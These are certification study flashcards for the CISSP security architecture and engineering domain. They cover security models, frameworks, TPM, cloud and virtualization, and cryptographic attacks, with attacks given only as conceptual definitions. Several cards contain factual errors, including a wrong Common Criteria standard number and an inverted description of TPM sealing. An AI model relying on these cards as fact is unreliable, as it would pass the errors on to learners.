1. Reconnaissance 2. Weaponization 3. Delivery 4. Exploitation 5. Installation 6. Command and Control 7. Actions

Domain 3. Security Architecture and Engineering Flashcards by paulo guiao

Principles for Zero Trust

Know your architecture (users, devices, and services)
Know your user, service, and device identities
Know the health of your users, devices, and services
Use policies to authorize requests
Authenticate everywhere
Focus your monitoring on devices and services
Don’t trust any network, including your own
Choose services designed for zero trust

How well did you know this?

Not at all

Perfectly

Seven foundational principles of Privacy by Design

Privacy as proactive and preventive, not reactive and remedial
Privacy as the default setting
Privacy embedded into design
Full functionality within a given solution
End-to-End Security
Visibility and Transparency
Respect for User Privacy

How well did you know this?

Not at all

Perfectly

The Cyber Kill Chain

Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command and Control
Actions

How well did you know this?

Not at all

Perfectly

Representation of something real

Model

How well did you know this?

Not at all

Perfectly

Representation of what security should look like in an architecture being built

Security model

How well did you know this?

Not at all

Perfectly

Comprehensive technical analysis of a solution or a product to ensure it meets the desired needs

Certification

How well did you know this?

Not at all

Perfectly

Official management signoff of certification for a set period of time

Accreditation

How well did you know this?

Not at all

Perfectly

Security Control Frameworks

Aid with the control selection process. Provide guidance, based upon best practices. Features from multiple frameworks can be used to meet the needs of an organization

How well did you know this?

Not at all

Perfectly

Particularly useful for IT assurance, created by ISACA, for information technology management and IT governance, and therefore it is particularly useful for IT assurance activities

The Control Objectives for Information Technologies (COBIT)

How well did you know this?

Not at all

Perfectly

Defines the process in a well-run IT department. And also defines the processes for IT service management that focuses on aligning IT services with business goals and objectives.

Information Technology Infrastructure Library (ITIL)

How well did you know this?

Not at all

Perfectly

Sets of best practices, standards, and recommendations that help an organization improve its cybersecurity controls.

NIST SP 800-53

How well did you know this?

Not at all

Perfectly

Is a standard for organization that handle credit cards like VISA, MasterCard, and AMEX.

Payment Card Industry Data Security Standard (PCI DSS)

How well did you know this?

Not at all

Perfectly

Specifies the requirements for establishing, implementing, maintaining, and continually improving an information security management system within the context of the organization. Also includes requirements for the assessment and treatment of information security risks tailored to the needs of the organization.

Organizations can be certified against ISO 27001.

Annex A of the standard contains the following domains:
1. Information security policies
2. Organization of information security
3. Human resources security
4. Asset management
5. Access control
6. Cryptography
7. Physical and environmental security
8. Operations security
9. Communications security
10. System acquisition, development, and maintenance
11. Supplier relationships
12. Information security incident management
13. Information security aspects of business continuity management
14. Compliance

International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) ISO 27001:2022

How well did you know this?

Not at all

Perfectly

ISO 27002 ISO/IEC 27002:2022 provides guidelines for organizational information security standards and information security management practices including the selection, implementation, and management of controls, taking into consideration the organization’s information security risk environment(s). Essentially ISO 27002 provides guidance for implementing the controls in ISO 27001.

ISO 27002

How well did you know this?

Not at all

Perfectly

is a voluntary private sector initiative dedicated to improving organizational performance and governance through effective internal control, enterprise risk management, and fraud deterrence.

Committee of Sponsoring Organizations of the Treadway Commission (COSO)

How well did you know this?

Not at all

Perfectly

Focuses on the protection of protected health information (PHI) of individuals.

Health Insurance Portability and Accountability Act (HIPAA)

How well did you know this?

Not at all

Perfectly

requires US federal agencies to develop, document, and implement agency-wide security programs to provide information security for the operations and assets of the agency. Further requires security programs for any other agencies, contractors, or service providers.

Federal Information Security Management (FISMA) Act of 2002

How well did you know this?

Not at all

Perfectly

provides a standardized approach to security assessment, authorization, and continuous monitoring for cloud products and services. Any cloud services that hold US federal government data must be FedRAMP authorized.

Federal Risk and Authorization Management Program (FedRAMP)

How well did you know this?

Not at all

Perfectly

Is a direct result of the wild financial fraud at “Enron”. The US Congress decided better controls were needed to be in place to prevent similar incidents from happening again, and specifically enacted SOX to prevent financial fraud by public companies and thereby protect the financial interests of shareholders.

Sarbanes-Oxley (SOX) Act

How well did you know this?

Not at all

Perfectly

Uses mandatory access control (MAC) to enforce the DoD multilevel security policy. Confidentiality. Lattice-based.

Simple Security Property (no read up)
Star (*) Security Property (no write down)
Strong star property (subject can read and write only at their own security level - not above or below)

Bell-LaPadula

How well did you know this?

Not at all

Perfectly

Integrity. Lattice-based.

Simple integrity property (no read down).
Star (*) integrity property (no write up).
Invocation property (subject can’t send information to someone that is rated at a higher layer of information than the current one the subject holds.

Biba

How well did you know this?

Not at all

Perfectly

Uses security labels to grant access to objects.

constrained data item (CDI) - is any data item whose integrity is protected by the security model
unconstrained data item (UDI) - any data item that is not controlled by the security model
Integrity verification procedure (IVP) - is a procedure that scans data items and confirms their integrity
transformation procedures (TPs) - are the only procedures that are allowed to modify a CDI

Access control triple (triplet)

Authenticated principal (user) “subjects” > programs (transformational procedures) > data items (UDIs and CDIs) “objects”

the relationship between an authenticated principal (i.e., user) and a set of programs (i.e., TPS) that operate on a set of data items (e.g., UDIs and CDIs)

Clark Wilson

How well did you know this?

Not at all

Perfectly

Confidentiality.

That supports four basic operations: take, grant, create, and revoke

Take Grant Model

How well did you know this?

Not at all

Perfectly

Confidentiality.

Also called the “Chinese Wall model”. It was developed to prevent conflict of interest (COI) problems.

Brewer and Nash Model

How well did you know this?

Not at all

Perfectly

Uses a formal set of protection rules for which each object has an owner and a controller. It focused on the secure creation and deletion of both subjects and objects. A collection of eight primary protection rules or actions that define the boundaries of certain secure actions.

Graham-Denning Model

Describes a system that is always secure no matter what state it is in. Based on the computer science definition of finite state machine (FSM). A state is a snapshot of a system at a specific moment in time. All state transitions must be evaluated. If each possible state transition results in another secure state, the system can be called a secure state machine.

State Machine Model

Focuses on the flow of information. And are based on a state machine model. Biba and Bell-LaPadula are both of this mode.

Information Flow Model

Is loosely based on the information flow model. Concerned with how actions of a subject at a higher security level affect the system state or the actions of a subject at a lower security level. Ensures that the actions of different objects and subjects aren't seen by (and don't interfere with) other objects and subjects on the same system.

Non-Interference Model

Based on the interaction between any combination of: Objects (such as resources, computers, and applications) and Subjects (such as individuals, groups or organizations)

Lattice-Based Model

Also known as the orange book, is the first evaluation criteria system. A structured set of criteria for evaluating computer security within products and systems.

Trusted Computer System Evaluation Criteria (TCSEC)

Represents an initial attempt to create security evaluation criteria in Europe. Uses two scales to rate functionality and assurance.

Information Technology Security Evaluation Criteria (ITSEC)

Enable an objective evaluation to validate that a particular product or system satisfies a defined set of security requirements.

Common Criteria (CC) ISO-IEC 15048

Specification of functional and assurance requirements for a specific type of security product.

Protection Profile (PP)

The specific product/system to be evaluated.

Target of Evaluation (ToE)

Written statement by vendor explaining how functional and assurance specifications of the product meet the protection profile (PP) requirements.

Security Targets (ST)

Security targets are evaluated from a functional perspective: what features exists and how well they work relative to the desired and expected security behavior.

Security functional requirements

Consider all of the components together

Evaluate

Common Criteria Steps:

Step 1. Protection Profile (PP) Step 2. Target of Evaluation (TOE) Step 3. Security Targets (ST) Step 4. Security Functional Requirements Step 5. Security Assurance Requirements Step 6. Evaluate Step 7. Assign EAL (1-7)

Is simply the concept of a subject accessing an object through some form of mediation that is based on a set of rules, with this access being logged and monitored.

The Reference Monitor Concept (RMC)

Refers to all the protection mechanisms within an architecture; the TCB is the totality of protection mechanisms within an architecture.

Trusted Computing Base (TCB)

Is the implementation of the reference monitor concept. Should consist of three properties, or characteristics: completeness, isolation, and verifiability.

Security Kernel

Is a form of conceptual layering that segregates and protects operational domains from each other.

The ring protection model

Is a piece of hardware that implements an ISO standard, resulting in the ability to establish trust involving security and privacy. Is an independent component of a computing system and functions similarly to a black box. Binding and sealing are important elements that help a __ maintain integrity.

Trusted Platform Module (TPM)

A cryptographic operation in which data is encrypted in such a way that it is tied (bound) to a specific TPM’s hardware and software configuration. For example, encryption keys that are stored on a TPM can be bound to it, ensuring that keys are only accessible by that specific TPM and that the system's integrity has not been compromised.

Binding

A cryptographic operation that involves encrypting data. However, unlike binding, sealing is not tied to the TPM’s state or configuration. Instead, sealing is used to only allow the data to be decrypted in certain conditions, such as in the presence of certain software or after user authentication. As an example, sealing can be used to ensure that certain data can only be decrypted by the TPM if a user logs into a system with the correct credentials.”

Sealing

Is a general term used to describe control systems related to industrial processes and critical infrastructure.

Industrial control system (ICS)

Used to monitor and control geographically dispersed assets. Typically communicates over long distances. For ex; power grids, water treatment, oil and gas pipelines.

SCADA (Supervisory Control and Data Acquisition)

Used for controlling processes in a localized area. Control elements are distributed but centrally managed. For ex; refineries, chemical plants, manufacturing.

DCS (Distributed Control System)

Rugged computers used for automation of electromechanical processes. Can be part of DCS or SCADA. For ex; Assembly lines, elevators, packaging systems.

PLC (Programmable Logic Controller)

Field devices that interface with sensors/actuators and communicate with SCADA systems. For ex; remote oil well monitoring, pipeline valves.

RTU (Remote Terminal Unit)

Interface between operators and control systems, allowing visualization and control. For ex; control room dashboards, touchscreen panels on machines.

HMI (Human-Machine Interface)

Self-service This means when particular resources are needed, they can be provisioned immediately and automatically.

On-demand self-service

access This means the cloud can be accessed from anywhere, using various types of devices, like smartphones, tablets, laptops.

Broad network access

Relates to sharing the three primary sources of cloud computing (processors, disk space, and the network). They are almost never directly accessible because of typically being shared—pooled—among multiple users.

Resource pooling

Relates to how quickly compute, storage, and network can be increased or decreased in the cloud. Resources can be rapidly provisioned and deprovisioned—usually automatically or with just a few clicks.

Rapid elasticity and scalability

The cloud provider tracks resource usage very closely, to the point that a cloud customer only pays for the resources used, measured in very small increments-minutes, or even seconds.

Measured service

Everybody has access to the cloud-it's open to the public-and cloud resources could potentially be shared with anybody, including malicious third parties being present as tenants on a cloud server.

Multitenancy

Environment where customers can deploy virtualized infrastructure, including compute, storage, and networking components.

IaaS

Platform which provides the services and functionality for customers to develop and deploy applications.

PaaS

Software offered by a cloud service provider which is available on demand, typically via the internet, for a customer.

SaaS

Also known as a virtual machine manager/monitor (VMM), is software that allows multiple operating systems to share the resources of a single physical machine.

Hypervisor

resembles a computer, but everything is emulated using software.

Virtual machine (VM)

Reduce attack surface (compared to a type 2 hypervisor). This makes it more secure if implemented correct. Commonly used for QA, load testing, and production scenarios. Typically more expensive. VMware ESXi, KVM, Microsoft Hyper-V

Type 1 "Bare metal"

Increased attack surface (due to the host operating system). This makes it less secure vs type 1, even if implemented properly. Commonly used for individual development and lab scenarios. Typically, less expensive. VMware Workstation, Oracle Virtualbox.

Type 2 "Hosted"

A lightweight, granular, and portable way to package applications for multiple platforms. Reduces overhead of server virtualization by enabling containerized apps to run on a shared OS kernel. Share many concerns of server virtualization: isolation at host, process, network, and storage levels. Can be used in some cases to isolate existing applications developed to run in a VM with a dedicated operating system.

Containerization

Collecting, gathering, or combining data for the purpose of statistical analysis.

Aggregation

Deducing information from evidence and reasoning rather than from explicit statements.

Inference

Is a deprecated XML-based, Organization for the Advancement of Structured Information Standards (OASIS) standard that was developed to allow cooperating users, resource owners, and service providers—the federation—to exchange information seamlessly for purposes of provisioning.

SPML (Services Provisioning Markup Language)

Is an XML-based, OASIS standard that utilizes security tokens that contain assertions about a user. Facilitates service requests made by users to service providers in the form of requests to identity providers, which—if the user is authenticated/authorized—result in __ assertions allowing the user access to the service.

SAML (Security Assertion Markup Language)

is a Federated Identity Management (FIM) open-standard protocol that typically works in conjunction with OpenID (authentication). Provides users and applications with “secure delegated access” via access tokens versus credentials. OAuth enables disparate resources to securely interact in a manner that ultimately allows a client to access data owned by a resource owner.

OAuth (Authorization)

Is a suite of technologies that is often looked upon as the future of wide area networks (WANs). It combines network security and wide area networking into a cloud-based service. It aims to get data and services as close to the end users as possible, while still maintaining robust security. It is an outgrowth of many other trends, such as cloud services, edge computing, and the increase in remote work, which requires new security approaches.

Secure Access Service Edge (SASE)

Involves a malicious script that is injected into a trusted website that a visitor’s browser then downloads and executes. The target of attack is the user's browser.

Cross-site scripting (XSS) attack

Relies on persistence facilitated by cookies in browsers. The target of attack is the web server.

Cross-site request forgery (CSRF)

Types of XSS (persistent or stored, reflected, DOM-based)

Persistent or Stored: injected code is stored on the server and embedded in the HTML page sent to all subsequent visitors (victims). PERSISTENT. Reflected: injected code is passed to a vulnerable server via URL and reflected to the victim. MOST COMMON form of XSS. DOM-based: client-side document object model (DOM) environment is modified, and malicious code injected. Can be either persistent or reflected. DOM-based XSS is intentionally not covered in detail, as this type of XSS attack is far more rare and unlikely to be covered on the exam.

Unwanted action performed on the user's browser. User's browser (client) runs malicious JavaScript code. User's browser is exploited.

XSS

Unwanted action performed on a trusted website. Website (server) executes a command from trusted user's browser. Web server is exploited.

CSRF

Also known as cleartext, data is readable by anyone.

Plaintext

Converting plaintext into ciphertext using cryptographic algorithm and a key/crypto variable.

Encrypt/Encryption

A KEY used to encrypt and decrypt the message.

Key/Crypto Variable

Turning ciphertext back into plaintext using a cryptographic algorithm and a key.

Decrypt/Decryption

Describes what happens when two different keys generate the same ciphertext from the same plaintext. This is bad, because if the two different keys can decrypt the same ciphertext, a brute-force attack can be performed twice as fast, as there will be two different keys that can decrypt the ciphertext. This will effectively reduces your key space (number of keys possible) in half.

Key Clustering

An estimated amount of time or effort required by an attacker to break a cryptosystem. The higher the work factor, the more secure the cryptosystem.

Work Factor

Is a random number that is used in conjunction with the key and fed into a cryptographic algorithm when encrypting plaintext. IVs should only be used once in any session and are used to prevent patterns in the resulting ciphertext.

Initialization Vector (IV)/Nonce

Focuses on hiding the relationship between the key and the resulting ciphertext. The confusion property suggests that if one bit of the key is changed, then about half of the bits in the ciphertext should change.

Confusion

focused on the plaintext. It suggests that if a single bit of the plaintext is changed, then approximately half of the bits in the ciphertext should change. The diffusion property focuses on hiding the relationship between the plaintext and the ciphertext.

Diffusion

To determine the security and effectiveness of an algorithm, the __ effect should be studied. It looks at the degree of confusion and diffusion that an algorithm provides. The ideal case is that a single bit change to either the key (confusion) or to the plaintext (diffusion) will result in at least a 50 percent change in the ciphertext.

Avalanche

Characters are replaced with a different character. For ex; GUBBINS > JXEELQV

Substitution

The order of characters is rearranged. For ex; GUBBINS > BINBUGS

Transposition

The primary goal of a __ attacks is to determine the key

Cryptanalytic attacks

Involves trying every possible key until the correct key is identified; typically not effective unless the key length is very short (56 bits or less).

Brute-force attack

The most difficult cryptanalytic attack, because the attacker ONLY has access to the ciphertext. In other words, the attacker has no real way to determine the actual plaintext except through enormous and timely effort.

Ciphertext-only attack

The attacker has access to both the ciphertext and plaintext, and both sources of information can be used to determine the key. More importantly, once the key is determined, two things can happen. One, other pieces of ciphertext can be easily decoded, and two, the key can be used to forge messages.

Known-plaintext attack

EVERYTHING except the KEY is known. The attacker can feed plaintext into the device and examine the resulting ciphertext to determine the key;

Chosen-plaintext attack

EVERYTHING except the KEY is known. The opposite happens, and ciphertext is fed into the machine with the resulting plaintext being scrutinized.

Chosen-ciphertext attack

Both types of attacks use complicated math to deduce the key. In each case, multiple iterations of the attack are conducted to determine probability values of a given key being the key used for encryption.

Differential cryptanalysis employs a form of chosen-plaintext attack. Linear cryptanalysis uses a known-plaintext attack approach.

In this attack, the attacker is trying to factor a very large number to determine the private key. This type of attack is specifically focused on the RSA algorithm, which uses factoring as the underlying hard math problem.

Factoring cryptanalysis

Attacker pretends to be both parties in relation to the communication.

Man-in-the-Middle Attack

Is like a man-in-the-middle attack, as the attacker is again able to monitor traffic flowing between two or more parties. However, this time the attacker aims at capturing useful information (like session identification details or authentication information) and then “replaying” it later to gain access to a target system.

Replay Attack

The goal of the attacker during this attack is to gain access to valid password hashes that can then be used to bypass standard authentication steps and authenticate to a system as a legitimate user.

Pass-the-Hash Attack

During the encryption or decryption process, the key might be obtained from a secure storage area and temporarily stored in RAM or another volatile memory location to facilitate quick decryption/encryption calculations. At this point, if an attacker can gain access to the system, they might be able to read the memory space and gain access to the key, which could then be used for much broader purposes.

Temporary Files Attack

Focus on an inherent weakness in how an algorithm is implemented rather than a weakness with the algorithm itself.

Implementation Attack

Are very sophisticated attacks and are therefore only used by equally sophisticated organizations, like intelligence agencies, advanced persistent threat groups, and security researchers. The target is not the system or the algorithm itself. Rather, using complex tools, a system’s operations can be monitored and measured. Based upon these observations and measurements of items like timing (the length of time to perform an activity), power used (how much power is consumed during an activity), and radiation emissions (emissions made by all devices and systems), significant insight can be gleaned.

Side-Channel Attack

Types of side-channel attacks:

Timing: Focuses on the length of time of an activity. Radiation Emissions: Focuses on the emissions made by all devices and systems. Power: Focuses on how much power is consumed during an activity.

Determine somebody’s password. Rather than trying every possible combination of letters and numbers, an attacker will utilize a much more efficient method and try the most likely possibilities/combinations of words to determine a password.

Dictionary Attack

Precomputed table of hash values, based upon the most popular passwords used in the world and the most popular hashing algorithms.

Rainbow Tables. To reduce the risk? use salt (random value appended to a password, which is then hashed).

Used to identify collisions in hashing algorithms.

Birthday Attack

This attack can be used to obtain a cryptographic key as well. Two such attacks are: purchase key attack (bribing someone to obtain a copy of the key) and rubber hose attack (use of duress or torture to obtain the key).

Social Engineering

is a technique that can be used to determine where vulnerabilities might exist. Involves deliberately injecting a fault into hardware or software to modify its normal behavior, which then allows identified vulnerabilities to be corrected.

Fault Injection Attack

No Power. Short period of time (Milliseconds).

Fault

Not enough power (e.g., low voltage). Short period of time (Milliseconds).

Sag/Dip

Too much power (e.g., high voltage). Short period of time (Milliseconds).

Spike

No power. Long period of time (Seconds, minutes, hours, days).

Blackout

Not enough power (e.g., low voltage). Long period of time (Seconds, minutes, hours, days).

Brownout

Too much power (e.g., high voltage). Long period of time (Seconds, minutes, hours, days).

Surge

The American Society of Heating, Refrigeration, and Air-Conditioning Engineers (ASHRAE) Temperature and Humidity Guidelines:

Temp, Low: 64.4°F / 18°C Temp, High: 80.6°F / 27°C Humidity, Low: 40% Relative humidity Humidity, High: 60% Relative humidity

The pipes in a sprinkler system are “wet”—filled with pressurized water at all times. In the event of activation, water will flow until the water source is shut off. This can result in significant excess water after a fire has been extinguished.

Wet Pipe

Do not always have pressurized water in the pipes. They’re dry and typically filled with some type of pressured gas (e.g., air or nitrogen). Witcher, Rob; Berti, John; Hablas, Lou; Mitropoulos, Nick. Destination CISSP: A Concise Guide (p. 542). Destination Certification Inc.. Kindle Edition.

Dry Pipe

Due to the detection system, concerns of water damage due to false activations can be eliminated using this. Water is held back until detectors in the area are activated; thus, other floors would not be showered with water.

Pre-action

Involves massive amounts of water flowing at once. With it, all sprinkler heads are in the open position. Thus, if a fire is detected, when the pre-action system activates the water valves, water will immediately flood the pipes and flow out of every sprinkler head. Should only be used where immediate extinguishment of a fire is required, like in a fireworks or explosives factory, where a fire could cause a catastrophic explosion.

Deluge

Gas Fire Suppression Systems:

INERGEN, Argonite, FM-200, Aero-K

Fire Extinguisher Types:

Class A. Type of Fire (common combustibles). Suppression Agents (Water, foam, dry chemicals). Class B. Type of Fire (Liquid). Suppression Agents (Gas, CO2, foam, dry chemicals). Class C. Type of Fire (Electrical). Suppression Agents (Gas, CO2, dry chemicals). Class D. Type of Fire (Combustible metals). Suppression Agents (Dry powders). Class K. Type of Fire (Commercial kitchens). Suppression Agents (Wet chemicals).

Manage the Information System Lifecycle:

1. Stakeholders needs and requirements 2. Requirements analysis 3. Architectural design 4. Development/Implementation 5. Integration 6. Verification and validation 7. Transition/deployment 8. Ops and maintenance/sustainment 9. Retirement/disposal

Identify the needs and requirements (problems the system needs to solve, goals it must achieve).

Stakeholders needs and requirements

Analyze and refine the requirements gathered to ensure they are consistent, complete, and unambiguous.

Requirement analysis

Develop a high-level blueprint of the overall architecture of the system, including hardware, software, and network components, with consideration to security and performance.

Architectural design

The actual build, development, acquisition, or implementation of the system based on the architectural design, ensuring secure coding practices are followed.

Development/implementation

Ensure components function together and meet defined requirements by aligning with the overall system architecture.

Integration

Confirm the system meets intended requirements (verification) and addresses the overall business/stakeholder needs (validation).

Verification and Validation

Move the system from development into the production environment in a controlled and secure manner.

Transition/deployment

Ongoing operation and management of the system to ensure availability and performance.

Ops and maint/sustainment

Secure decommissioning or disposal of the system when it reaches the end of its useful life or becomes obsolete.

Retirement/disposal

Domain 3. Security Architecture and Engineering Flashcards

(131 cards)